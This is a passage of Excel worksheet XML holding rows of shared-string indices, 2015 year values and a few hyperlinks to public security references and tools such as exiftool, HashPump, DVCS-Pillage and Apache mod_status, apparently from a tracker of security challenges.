      <c r="M160" s="29"/>
      <c r="N160" s="29"/>
      <c r="O160" s="29"/>
      <c r="P160" s="29"/>
      <c r="Q160" s="29"/>
      <c r="R160" s="29"/>
      <c r="S160" s="29"/>
      <c r="T160" s="29"/>
      <c r="U160" s="29"/>
      <c r="V160" s="29"/>
      <c r="W160" s="29"/>
      <c r="X160" s="29"/>
      <c r="Y160" s="29"/>
      <c r="Z160" s="29"/>
    </row>
    <row r="161">
      <c r="A161" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B161" s="71">
        <v>2015.0</v>
      </c>
      <c r="C161" s="89">
        <v>2.147483648E7</v>
      </c>
      <c r="D161" s="70" t="s">
        <v>767</v>
      </c>
      <c r="E161" s="70" t="s">
        <v>232</v>
      </c>
      <c r="F161" s="70" t="s">
        <v>1057</v>
      </c>
      <c r="G161" s="70" t="s">
        <v>1059</v>
      </c>
      <c r="H161" s="29"/>
      <c r="I161" s="29"/>
      <c r="J161" s="29"/>
      <c r="K161" s="29"/>
      <c r="L161" s="29"/>
      <c r="M161" s="29"/>
      <c r="N161" s="29"/>
      <c r="O161" s="29"/>
      <c r="P161" s="29"/>
      <c r="Q161" s="29"/>
      <c r="R161" s="29"/>
      <c r="S161" s="29"/>
      <c r="T161" s="29"/>
      <c r="U161" s="29"/>
      <c r="V161" s="29"/>
      <c r="W161" s="29"/>
      <c r="X161" s="29"/>
      <c r="Y161" s="29"/>
      <c r="Z161" s="29"/>
    </row>
    <row r="162">
      <c r="A162" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B162" s="71">
        <v>2015.0</v>
      </c>
      <c r="C162" s="70" t="s">
        <v>1061</v>
      </c>
      <c r="D162" s="70" t="s">
        <v>23</v>
      </c>
      <c r="E162" s="72"/>
      <c r="F162" s="70" t="s">
        <v>1062</v>
      </c>
      <c r="G162" s="70" t="s">
        <v>1063</v>
      </c>
      <c r="H162" s="29"/>
      <c r="I162" s="29"/>
      <c r="J162" s="29"/>
      <c r="K162" s="29"/>
      <c r="L162" s="29"/>
      <c r="M162" s="29"/>
      <c r="N162" s="29"/>
      <c r="O162" s="29"/>
      <c r="P162" s="29"/>
      <c r="Q162" s="29"/>
      <c r="R162" s="29"/>
      <c r="S162" s="29"/>
      <c r="T162" s="29"/>
      <c r="U162" s="29"/>
      <c r="V162" s="29"/>
      <c r="W162" s="29"/>
      <c r="X162" s="29"/>
      <c r="Y162" s="29"/>
      <c r="Z162" s="29"/>
    </row>
    <row r="163">
      <c r="A163" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B163" s="71">
        <v>2015.0</v>
      </c>
      <c r="C163" s="70" t="s">
        <v>1067</v>
      </c>
      <c r="D163" s="70" t="s">
        <v>23</v>
      </c>
      <c r="E163" s="70" t="s">
        <v>232</v>
      </c>
      <c r="F163" s="70" t="s">
        <v>1069</v>
      </c>
      <c r="G163" s="70" t="s">
        <v>1071</v>
      </c>
      <c r="H163" s="29"/>
      <c r="I163" s="29"/>
      <c r="J163" s="29"/>
      <c r="K163" s="29"/>
      <c r="L163" s="29"/>
      <c r="M163" s="29"/>
      <c r="N163" s="29"/>
      <c r="O163" s="29"/>
      <c r="P163" s="29"/>
      <c r="Q163" s="29"/>
      <c r="R163" s="29"/>
      <c r="S163" s="29"/>
      <c r="T163" s="29"/>
      <c r="U163" s="29"/>
      <c r="V163" s="29"/>
      <c r="W163" s="29"/>
      <c r="X163" s="29"/>
      <c r="Y163" s="29"/>
      <c r="Z163" s="29"/>
    </row>
    <row r="164">
      <c r="A164" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B164" s="71">
        <v>2015.0</v>
      </c>
      <c r="C164" s="70" t="s">
        <v>1075</v>
      </c>
      <c r="D164" s="70" t="s">
        <v>23</v>
      </c>
      <c r="E164" s="70" t="s">
        <v>25</v>
      </c>
      <c r="F164" s="70" t="s">
        <v>1078</v>
      </c>
      <c r="G164" s="70" t="s">
        <v>1079</v>
      </c>
      <c r="H164" s="29"/>
      <c r="I164" s="29"/>
      <c r="J164" s="29"/>
      <c r="K164" s="29"/>
      <c r="L164" s="29"/>
      <c r="M164" s="29"/>
      <c r="N164" s="29"/>
      <c r="O164" s="29"/>
      <c r="P164" s="29"/>
      <c r="Q164" s="29"/>
      <c r="R164" s="29"/>
      <c r="S164" s="29"/>
      <c r="T164" s="29"/>
      <c r="U164" s="29"/>
      <c r="V164" s="29"/>
      <c r="W164" s="29"/>
      <c r="X164" s="29"/>
      <c r="Y164" s="29"/>
      <c r="Z164" s="29"/>
    </row>
    <row r="165">
      <c r="A165" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B165" s="71">
        <v>2015.0</v>
      </c>
      <c r="C165" s="70" t="s">
        <v>1083</v>
      </c>
      <c r="D165" s="70" t="s">
        <v>23</v>
      </c>
      <c r="E165" s="72"/>
      <c r="F165" s="70" t="s">
        <v>1085</v>
      </c>
      <c r="G165" s="70" t="s">
        <v>1086</v>
      </c>
      <c r="H165" s="29"/>
      <c r="I165" s="29"/>
      <c r="J165" s="29"/>
      <c r="K165" s="29"/>
      <c r="L165" s="29"/>
      <c r="M165" s="29"/>
      <c r="N165" s="29"/>
      <c r="O165" s="29"/>
      <c r="P165" s="29"/>
      <c r="Q165" s="29"/>
      <c r="R165" s="29"/>
      <c r="S165" s="29"/>
      <c r="T165" s="29"/>
      <c r="U165" s="29"/>
      <c r="V165" s="29"/>
      <c r="W165" s="29"/>
      <c r="X165" s="29"/>
      <c r="Y165" s="29"/>
      <c r="Z165" s="29"/>
    </row>
    <row r="166">
      <c r="A166" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B166" s="71">
        <v>2015.0</v>
      </c>
      <c r="C166" s="70" t="s">
        <v>1091</v>
      </c>
      <c r="D166" s="70" t="s">
        <v>23</v>
      </c>
      <c r="E166" s="70" t="s">
        <v>25</v>
      </c>
      <c r="F166" s="70" t="s">
        <v>1092</v>
      </c>
      <c r="G166" s="13" t="s">
        <v>1093</v>
      </c>
      <c r="H166" s="29"/>
      <c r="I166" s="29"/>
      <c r="J166" s="29"/>
      <c r="K166" s="29"/>
      <c r="L166" s="29"/>
      <c r="M166" s="29"/>
      <c r="N166" s="29"/>
      <c r="O166" s="29"/>
      <c r="P166" s="29"/>
      <c r="Q166" s="29"/>
      <c r="R166" s="29"/>
      <c r="S166" s="29"/>
      <c r="T166" s="29"/>
      <c r="U166" s="29"/>
      <c r="V166" s="29"/>
      <c r="W166" s="29"/>
      <c r="X166" s="29"/>
      <c r="Y166" s="29"/>
      <c r="Z166" s="29"/>
    </row>
    <row r="167">
      <c r="A167" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B167" s="71">
        <v>2015.0</v>
      </c>
      <c r="C167" s="70" t="s">
        <v>1094</v>
      </c>
      <c r="D167" s="70" t="s">
        <v>23</v>
      </c>
      <c r="E167" s="70" t="s">
        <v>42</v>
      </c>
      <c r="F167" s="70" t="s">
        <v>92</v>
      </c>
      <c r="G167" s="70" t="s">
        <v>1095</v>
      </c>
      <c r="H167" s="29"/>
      <c r="I167" s="29"/>
      <c r="J167" s="29"/>
      <c r="K167" s="29"/>
      <c r="L167" s="29"/>
      <c r="M167" s="29"/>
      <c r="N167" s="29"/>
      <c r="O167" s="29"/>
      <c r="P167" s="29"/>
      <c r="Q167" s="29"/>
      <c r="R167" s="29"/>
      <c r="S167" s="29"/>
      <c r="T167" s="29"/>
      <c r="U167" s="29"/>
      <c r="V167" s="29"/>
      <c r="W167" s="29"/>
      <c r="X167" s="29"/>
      <c r="Y167" s="29"/>
      <c r="Z167" s="29"/>
    </row>
    <row r="168">
      <c r="A168" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B168" s="71">
        <v>2015.0</v>
      </c>
      <c r="C168" s="70" t="s">
        <v>1099</v>
      </c>
      <c r="D168" s="70" t="s">
        <v>128</v>
      </c>
      <c r="E168" s="72"/>
      <c r="F168" s="70" t="s">
        <v>1100</v>
      </c>
      <c r="G168" s="13" t="s">
        <v>1102</v>
      </c>
      <c r="H168" s="29"/>
      <c r="I168" s="29"/>
      <c r="J168" s="29"/>
      <c r="K168" s="29"/>
      <c r="L168" s="29"/>
      <c r="M168" s="29"/>
      <c r="N168" s="29"/>
      <c r="O168" s="29"/>
      <c r="P168" s="29"/>
      <c r="Q168" s="29"/>
      <c r="R168" s="29"/>
      <c r="S168" s="29"/>
      <c r="T168" s="29"/>
      <c r="U168" s="29"/>
      <c r="V168" s="29"/>
      <c r="W168" s="29"/>
      <c r="X168" s="29"/>
      <c r="Y168" s="29"/>
      <c r="Z168" s="29"/>
    </row>
    <row r="169">
      <c r="A169" s="70" t="s">
        <v>1040</v>
      </c>
      <c r="B169" s="71">
        <v>2015.0</v>
      </c>
      <c r="C169" s="70" t="s">
        <v>1106</v>
      </c>
      <c r="D169" s="70" t="s">
        <v>128</v>
      </c>
      <c r="E169" s="72"/>
      <c r="F169" s="70" t="s">
        <v>1044</v>
      </c>
      <c r="G169" s="70" t="s">
        <v>1109</v>
      </c>
      <c r="H169" s="29"/>
      <c r="I169" s="29"/>
      <c r="J169" s="29"/>
      <c r="K169" s="29"/>
      <c r="L169" s="29"/>
      <c r="M169" s="29"/>
      <c r="N169" s="29"/>
      <c r="O169" s="29"/>
      <c r="P169" s="29"/>
      <c r="Q169" s="29"/>
      <c r="R169" s="29"/>
      <c r="S169" s="29"/>
      <c r="T169" s="29"/>
      <c r="U169" s="29"/>
      <c r="V169" s="29"/>
      <c r="W169" s="29"/>
      <c r="X169" s="29"/>
      <c r="Y169" s="29"/>
      <c r="Z169" s="29"/>
    </row>
    <row r="170">
      <c r="A170" s="23" t="s">
        <v>1111</v>
      </c>
      <c r="B170" s="24">
        <v>2015.0</v>
      </c>
      <c r="C170" s="23" t="s">
        <v>1112</v>
      </c>
      <c r="D170" s="23" t="s">
        <v>48</v>
      </c>
      <c r="E170" s="23" t="s">
        <v>25</v>
      </c>
      <c r="F170" s="23" t="s">
        <v>1113</v>
      </c>
      <c r="G170" s="23" t="s">
        <v>1114</v>
      </c>
      <c r="J170" s="29"/>
      <c r="K170" s="29"/>
      <c r="L170" s="29"/>
      <c r="M170" s="29"/>
      <c r="N170" s="29"/>
      <c r="O170" s="29"/>
      <c r="P170" s="29"/>
      <c r="Q170" s="29"/>
      <c r="R170" s="29"/>
      <c r="S170" s="29"/>
      <c r="T170" s="29"/>
      <c r="U170" s="29"/>
      <c r="V170" s="29"/>
      <c r="W170" s="29"/>
      <c r="X170" s="29"/>
      <c r="Y170" s="29"/>
      <c r="Z170" s="29"/>
    </row>
    <row r="171">
      <c r="A171" s="23" t="s">
        <v>1111</v>
      </c>
      <c r="B171" s="24">
        <v>2015.0</v>
      </c>
      <c r="C171" s="23" t="s">
        <v>1120</v>
      </c>
      <c r="D171" s="23" t="s">
        <v>48</v>
      </c>
      <c r="E171" s="23" t="s">
        <v>42</v>
      </c>
      <c r="F171" s="23" t="s">
        <v>227</v>
      </c>
      <c r="H171" s="28"/>
      <c r="I171" s="28"/>
      <c r="J171" s="29"/>
      <c r="K171" s="29"/>
      <c r="L171" s="29"/>
      <c r="M171" s="29"/>
      <c r="N171" s="29"/>
      <c r="O171" s="29"/>
      <c r="P171" s="29"/>
      <c r="Q171" s="29"/>
      <c r="R171" s="29"/>
      <c r="S171" s="29"/>
      <c r="T171" s="29"/>
      <c r="U171" s="29"/>
      <c r="V171" s="29"/>
      <c r="W171" s="29"/>
      <c r="X171" s="29"/>
      <c r="Y171" s="29"/>
      <c r="Z171" s="29"/>
    </row>
    <row r="172">
      <c r="A172" s="23" t="s">
        <v>1111</v>
      </c>
      <c r="B172" s="24">
        <v>2015.0</v>
      </c>
      <c r="C172" s="23" t="s">
        <v>1121</v>
      </c>
      <c r="D172" s="23" t="s">
        <v>48</v>
      </c>
      <c r="E172" s="23" t="s">
        <v>1122</v>
      </c>
      <c r="F172" s="23" t="s">
        <v>1123</v>
      </c>
      <c r="G172" s="13" t="s">
        <v>1124</v>
      </c>
      <c r="J172" s="29"/>
      <c r="K172" s="29"/>
      <c r="L172" s="29"/>
      <c r="M172" s="29"/>
      <c r="N172" s="29"/>
      <c r="O172" s="29"/>
      <c r="P172" s="29"/>
      <c r="Q172" s="29"/>
      <c r="R172" s="29"/>
      <c r="S172" s="29"/>
      <c r="T172" s="29"/>
      <c r="U172" s="29"/>
      <c r="V172" s="29"/>
      <c r="W172" s="29"/>
      <c r="X172" s="29"/>
      <c r="Y172" s="29"/>
      <c r="Z172" s="29"/>
    </row>
    <row r="173">
      <c r="A173" s="17">
        <v>42552.0</v>
      </c>
      <c r="B173" s="65"/>
      <c r="C173" s="65"/>
      <c r="D173" s="65"/>
      <c r="E173" s="9"/>
      <c r="F173" s="65"/>
      <c r="G173" s="65"/>
      <c r="H173" s="66"/>
      <c r="I173" s="9"/>
      <c r="J173" s="9"/>
      <c r="K173" s="9"/>
      <c r="L173" s="9"/>
      <c r="M173" s="9"/>
      <c r="N173" s="9"/>
      <c r="O173" s="9"/>
      <c r="P173" s="9"/>
      <c r="Q173" s="9"/>
      <c r="R173" s="9"/>
      <c r="S173" s="9"/>
      <c r="T173" s="9"/>
      <c r="U173" s="9"/>
      <c r="V173" s="9"/>
      <c r="W173" s="9"/>
      <c r="X173" s="9"/>
      <c r="Y173" s="9"/>
      <c r="Z173" s="9"/>
    </row>
    <row r="174">
      <c r="A174" s="5" t="s">
        <v>348</v>
      </c>
      <c r="B174" s="43">
        <v>2015.0</v>
      </c>
      <c r="C174" s="5" t="s">
        <v>1129</v>
      </c>
      <c r="D174" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E174" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F174" s="5" t="s">
        <v>1130</v>
      </c>
      <c r="G174" s="5" t="s">
        <v>1131</v>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="30" t="s">
        <v>1132</v>
      </c>
      <c r="B175" s="31">
        <v>2015.0</v>
      </c>
      <c r="C175" s="30" t="s">
        <v>1133</v>
      </c>
      <c r="D175" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E175" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F175" s="35" t="s">
        <v>1135</v>
      </c>
      <c r="G175" s="35" t="s">
        <v>1137</v>
      </c>
      <c r="H175" s="40" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="s">
        <v>1140</v>
      </c>
      <c r="B176" s="43">
        <v>2015.0</v>
      </c>
      <c r="C176" s="5" t="s">
        <v>1141</v>
      </c>
      <c r="D176" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E176" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F176" s="5" t="s">
        <v>1142</v>
      </c>
      <c r="G176" s="5" t="s">
        <v>1144</v>
      </c>
      <c r="H176" s="56" t="s">
        <v>1145</v>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="s">
        <v>1140</v>
      </c>
      <c r="B177" s="43">
        <v>2015.0</v>
      </c>
      <c r="C177" s="5" t="s">
        <v>1150</v>
      </c>
      <c r="D177" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E177" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F177" s="5" t="s">
        <v>1151</v>
      </c>
      <c r="G177" s="13" t="s">
        <v>1153</v>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="s">
        <v>1140</v>
      </c>
      <c r="B178" s="43">
        <v>2015.0</v>
      </c>
      <c r="C178" s="5" t="s">
        <v>1156</v>
      </c>
      <c r="D178" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E178" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F178" s="5" t="s">
        <v>1157</v>
      </c>
      <c r="G178" s="5" t="s">
        <v>1158</v>
      </c>
      <c r="H178" s="3"/>
    </row>
    <row r="179">
      <c r="A179" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B179" s="31">
        <v>2015.0</v>
      </c>
      <c r="C179" s="30" t="s">
        <v>1160</v>
      </c>
      <c r="D179" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E179" s="30" t="s">
        <v>621</v>
      </c>
      <c r="F179" s="35" t="s">
        <v>1161</v>
      </c>
      <c r="G179" s="30" t="s">
        <v>1164</v>
      </c>
      <c r="H179" s="33" t="str">
        <f>HYPERLINK("http://www.sno.phy.queensu.ca/~phil/exiftool/","exiftool")</f>
        <v>exiftool</v>
      </c>
      <c r="I179" s="30"/>
    </row>
    <row r="180">
      <c r="A180" s="30" t="s">
        <v>1159</v>
      </c>
      <c r="B180" s="31">
        <v>2015.0</v>
      </c>
      <c r="C180" s="30" t="s">
        <v>1173</v>
      </c>
      <c r="D180" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E180" s="30" t="s">
        <v>797</v>
      </c>
      <c r="F180" s="35" t="s">
        <v>1174</v>
      </c>
      <c r="G180" s="30" t="s">
        <v>1175</v>
      </c>
      <c r="H180" s="30" t="s">
        <v>658</v>
      </c>
      <c r="I180" s="30"/>
    </row>
    <row r="181">
      <c r="A181" s="40" t="s">
        <v>1176</v>
      </c>
      <c r="B181" s="40">
        <v>2015.0</v>
      </c>
      <c r="C181" s="40" t="s">
        <v>1178</v>
      </c>
      <c r="D181" s="40" t="s">
        <v>23</v>
      </c>
      <c r="F181" s="40" t="s">
        <v>1183</v>
      </c>
      <c r="G181" s="40" t="s">
        <v>1184</v>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="40" t="s">
        <v>1176</v>
      </c>
      <c r="B182" s="40">
        <v>2015.0</v>
      </c>
      <c r="C182" s="40" t="s">
        <v>1187</v>
      </c>
      <c r="E182" s="40" t="s">
        <v>42</v>
      </c>
      <c r="F182" s="40" t="s">
        <v>92</v>
      </c>
      <c r="G182" s="40" t="s">
        <v>92</v>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="17">
        <v>42570.0</v>
      </c>
      <c r="B183" s="65"/>
      <c r="C183" s="65"/>
      <c r="D183" s="65"/>
      <c r="E183" s="9"/>
      <c r="F183" s="65"/>
      <c r="G183" s="65"/>
      <c r="H183" s="66"/>
      <c r="I183" s="9"/>
      <c r="J183" s="9"/>
      <c r="K183" s="9"/>
      <c r="L183" s="9"/>
      <c r="M183" s="9"/>
      <c r="N183" s="9"/>
      <c r="O183" s="9"/>
      <c r="P183" s="9"/>
      <c r="Q183" s="9"/>
      <c r="R183" s="9"/>
      <c r="S183" s="9"/>
      <c r="T183" s="9"/>
      <c r="U183" s="9"/>
      <c r="V183" s="9"/>
      <c r="W183" s="9"/>
      <c r="X183" s="9"/>
      <c r="Y183" s="9"/>
      <c r="Z183" s="9"/>
    </row>
    <row r="184">
      <c r="A184" s="30" t="s">
        <v>1193</v>
      </c>
      <c r="B184" s="31">
        <v>2015.0</v>
      </c>
      <c r="C184" s="30" t="s">
        <v>1195</v>
      </c>
      <c r="D184" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E184" s="30" t="s">
        <v>25</v>
      </c>
      <c r="F184" s="35" t="s">
        <v>1199</v>
      </c>
      <c r="G184" s="35" t="s">
        <v>1200</v>
      </c>
      <c r="H184" s="35" t="s">
        <v>1139</v>
      </c>
      <c r="I184" s="30"/>
      <c r="J184" s="30"/>
    </row>
    <row r="185">
      <c r="A185" s="30" t="s">
        <v>1193</v>
      </c>
      <c r="B185" s="31">
        <v>2015.0</v>
      </c>
      <c r="C185" s="30" t="s">
        <v>1203</v>
      </c>
      <c r="D185" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E185" s="30" t="s">
        <v>992</v>
      </c>
      <c r="F185" s="35" t="s">
        <v>1206</v>
      </c>
      <c r="G185" s="30" t="s">
        <v>1209</v>
      </c>
      <c r="H185" s="33" t="str">
        <f>HYPERLINK("http://security.stackexchange.com/questions/27906/playing-with-referrer-header","playing with referrer")</f>
        <v>playing with referrer</v>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="30" t="s">
        <v>1216</v>
      </c>
      <c r="B186" s="31">
        <v>2015.0</v>
      </c>
      <c r="C186" s="30" t="s">
        <v>1217</v>
      </c>
      <c r="D186" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E186" s="30" t="s">
        <v>1218</v>
      </c>
      <c r="F186" s="30" t="s">
        <v>1219</v>
      </c>
      <c r="G186" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Hash-based_message_authentication_code","Hash-based message auth code 'HMAC'")</f>
        <v>Hash-based message auth code 'HMAC'</v>
      </c>
      <c r="H186" s="33" t="str">
        <f>HYPERLINK("https://github.com/bwall/HashPump","HashPump")</f>
        <v>HashPump</v>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="30" t="s">
        <v>1216</v>
      </c>
      <c r="B187" s="31">
        <v>2015.0</v>
      </c>
      <c r="C187" s="30" t="s">
        <v>1249</v>
      </c>
      <c r="D187" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E187" s="30" t="s">
        <v>1251</v>
      </c>
      <c r="F187" s="35" t="s">
        <v>1252</v>
      </c>
      <c r="G187" s="30" t="s">
        <v>1256</v>
      </c>
      <c r="H187" s="33" t="str">
        <f>HYPERLINK("http://httpd.apache.org/docs/2.2/mod/mod_status.html","mod_status")</f>
        <v>mod_status</v>
      </c>
      <c r="I187" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/SOCKS","socks server")</f>
        <v>socks server</v>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="30" t="s">
        <v>1216</v>
      </c>
      <c r="B188" s="31">
        <v>2015.0</v>
      </c>
      <c r="C188" s="30" t="s">
        <v>1262</v>
      </c>
      <c r="D188" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E188" s="30" t="s">
        <v>25</v>
      </c>
      <c r="F188" s="35" t="s">
        <v>1263</v>
      </c>
      <c r="G188" s="30" t="s">
        <v>1264</v>
      </c>
      <c r="H188" s="35" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B189" s="31">
        <v>2015.0</v>
      </c>
      <c r="C189" s="30" t="s">
        <v>1266</v>
      </c>
      <c r="D189" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E189" s="35" t="s">
        <v>909</v>
      </c>
      <c r="F189" s="35" t="s">
        <v>1267</v>
      </c>
      <c r="G189" s="30" t="s">
        <v>1268</v>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B190" s="31">
        <v>2015.0</v>
      </c>
      <c r="C190" s="30" t="s">
        <v>1270</v>
      </c>
      <c r="D190" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E190" s="35" t="s">
        <v>909</v>
      </c>
      <c r="F190" s="35" t="s">
        <v>1272</v>
      </c>
      <c r="G190" s="30" t="s">
        <v>1275</v>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B191" s="31">
        <v>2015.0</v>
      </c>
      <c r="C191" s="30" t="s">
        <v>1276</v>
      </c>
      <c r="D191" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E191" s="30" t="s">
        <v>25</v>
      </c>
      <c r="F191" s="35" t="s">
        <v>1277</v>
      </c>
      <c r="G191" s="30" t="s">
        <v>1278</v>
      </c>
      <c r="H191" s="33" t="str">
        <f>HYPERLINK("https://github.com/evilpacket/DVCS-Pillage","DVCS-Pillage")</f>
        <v>DVCS-Pillage</v>
      </c>
      <c r="I191" s="30"/>
      <c r="J191" s="30"/>
      <c r="K191" s="30"/>
      <c r="L191" s="30"/>
    </row>
    <row r="192">
      <c r="A192" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B192" s="31">
        <v>2015.0</v>
      </c>
      <c r="C192" s="30" t="s">
        <v>1288</v>
      </c>
      <c r="D192" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E192" s="30" t="s">
        <v>300</v>
      </c>
      <c r="F192" s="35" t="s">
        <v>1277</v>
      </c>
      <c r="G192" s="30" t="s">
        <v>1290</v>
      </c>
      <c r="H192" s="30" t="s">
        <v>1292</v>
      </c>
      <c r="I192" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Time-based_One-time_Password_Algorithm","TOTP - Passwords")</f>
        <v>TOTP - Passwords</v>
      </c>
      <c r="J192" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Ashley_Madison_data_breach","Ashley-Madison Data Breach")</f>
        <v>Ashley-Madison Data Breach</v>
      </c>
      <c r="K192" s="30"/>
      <c r="L192" s="30"/>
    </row>
    <row r="193">
      <c r="A193" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B193" s="31">
        <v>2015.0</v>
      </c>
      <c r="C193" s="30" t="s">
        <v>1293</v>
      </c>
      <c r="D193" s="30" t="s">
        <v>1294</v>
      </c>
      <c r="E193" s="30" t="s">
        <v>51</v>
      </c>
      <c r="F193" s="35" t="s">
        <v>1295</v>
      </c>
      <c r="G193" s="30" t="s">
        <v>1297</v>
      </c>
      <c r="H193" s="30" t="s">
        <v>1298</v>
      </c>
      <c r="I193" s="30"/>
      <c r="J193" s="30"/>
      <c r="K193" s="30"/>
      <c r="L193" s="30"/>
    </row>
    <row r="194">
      <c r="A194" s="30" t="s">
        <v>1300</v>
      </c>
      <c r="B194" s="31">
        <v>2015.0</v>
      </c>
      <c r="C194" s="30" t="s">
        <v>1301</v>
      </c>
      <c r="D194" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E194" s="30" t="s">
        <v>25</v>
      </c>
      <c r="F194" s="35" t="s">
        <v>1277</v>
      </c>
      <c r="G194" s="30" t="s">
        <v>1302</v>
      </c>
      <c r="H194" s="30"/>
      <c r="I194" s="30"/>
    </row>
    <row r="195">
      <c r="A195" s="5" t="s">
        <v>1303</v>
      </c>
      <c r="B195" s="43">
        <v>2015.0</v>
      </c>
      <c r="C195" s="5" t="s">
        <v>1305</v>
      </c>
      <c r="D195" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E195" s="5" t="s">
        <v>1306</v>
      </c>
      <c r="F195" s="5" t="s">
        <v>1307</v>
      </c>
      <c r="G195" s="5" t="s">
        <v>1309</v>
      </c>
      <c r="H195" s="5" t="s">
        <v>1311</v>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="s">
        <v>1303</v>
      </c>
      <c r="B196" s="43">
        <v>2015.0</v>
      </c>
      <c r="C196" s="5" t="s">
        <v>1314</v>
      </c>
      <c r="D196" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E196" s="3"/>
      <c r="F196" s="5" t="s">
        <v>1317</v>
      </c>
      <c r="G196" s="5" t="s">
        <v>1319</v>
      </c>
      <c r="H196" s="3"/>
    </row>
    <row r="197">
      <c r="A197" s="5" t="s">
        <v>1303</v>
      </c>
      <c r="B197" s="43">
        <v>2015.0</v>
      </c>
      <c r="C197" s="5" t="s">
        <v>1324</v>
      </c>
      <c r="D197" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E197" s="5" t="s">
        <v>96</v>
      </c>
      <c r="F197" s="5" t="s">
        <v>1328</v>
      </c>
      <c r="G197" s="5" t="s">
        <v>1329</v>
      </c>
      <c r="H197" s="3"/>
    </row>
    <row r="198">
      <c r="A198" s="30" t="s">
        <v>167</v>
      </c>
      <c r="B198" s="31">
        <v>2015.0</v>
      </c>
      <c r="C198" s="30" t="s">
        <v>1331</v>
      </c>
      <c r="D198" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E198" s="30"/>
      <c r="F198" s="30" t="s">
        <v>86</v>
      </c>
      <c r="G198" s="30" t="s">
        <v>1332</v>
      </c>
      <c r="H198" s="30"/>
      <c r="I198" s="30"/>
      <c r="J198" s="30"/>
    </row>
    <row r="199">
      <c r="A199" s="30" t="s">
        <v>1334</v>
      </c>
      <c r="B199" s="31">
        <v>2015.0</v>
      </c>
      <c r="C199" s="30" t="s">
        <v>1335</v>
      </c>
      <c r="D199" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E199" s="30" t="s">
        <v>42</v>
      </c>
      <c r="F199" s="30" t="s">
        <v>92</v>
      </c>
      <c r="G199" s="30" t="s">
        <v>92</v>
      </c>
      <c r="H199" s="30"/>
      <c r="I199" s="30"/>
      <c r="J199" s="30"/>
    </row>
    <row r="200">
      <c r="A200" s="30" t="s">
        <v>1334</v>
      </c>
      <c r="B200" s="31">
        <v>2015.0</v>
      </c>
      <c r="C200" s="30" t="s">
        <v>1338</v>
      </c>
      <c r="D200" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E200" s="30" t="s">
        <v>25</v>
      </c>
      <c r="F200" s="30" t="s">
        <v>1339</v>
      </c>
      <c r="G200" s="30" t="s">
        <v>1340</v>
      </c>
      <c r="H200" s="30"/>
      <c r="I200" s="30"/>
      <c r="J200" s="30"/>
    </row>
    <row r="201">
      <c r="A201" s="30" t="s">
        <v>1334</v>
      </c>
      <c r="B201" s="31">
        <v>2015.0</v>
      </c>
      <c r="C201" s="30" t="s">
        <v>1341</v>
      </c>
      <c r="D201" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E201" s="30"/>
      <c r="F201" s="30" t="s">
        <v>1343</v>
      </c>
      <c r="G201" s="30" t="s">
        <v>1346</v>
      </c>
      <c r="H201" s="30"/>
      <c r="I201" s="30"/>
      <c r="J201" s="30"/>
    </row>
    <row r="202">
      <c r="A202" s="30" t="s">
        <v>1348</v>
      </c>
      <c r="B202" s="31">
        <v>2015.0</v>
      </c>
      <c r="C202" s="30" t="s">
        <v>1350</v>
      </c>
      <c r="D202" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E202" s="30" t="s">
        <v>785</v>
      </c>
      <c r="F202" s="30" t="s">
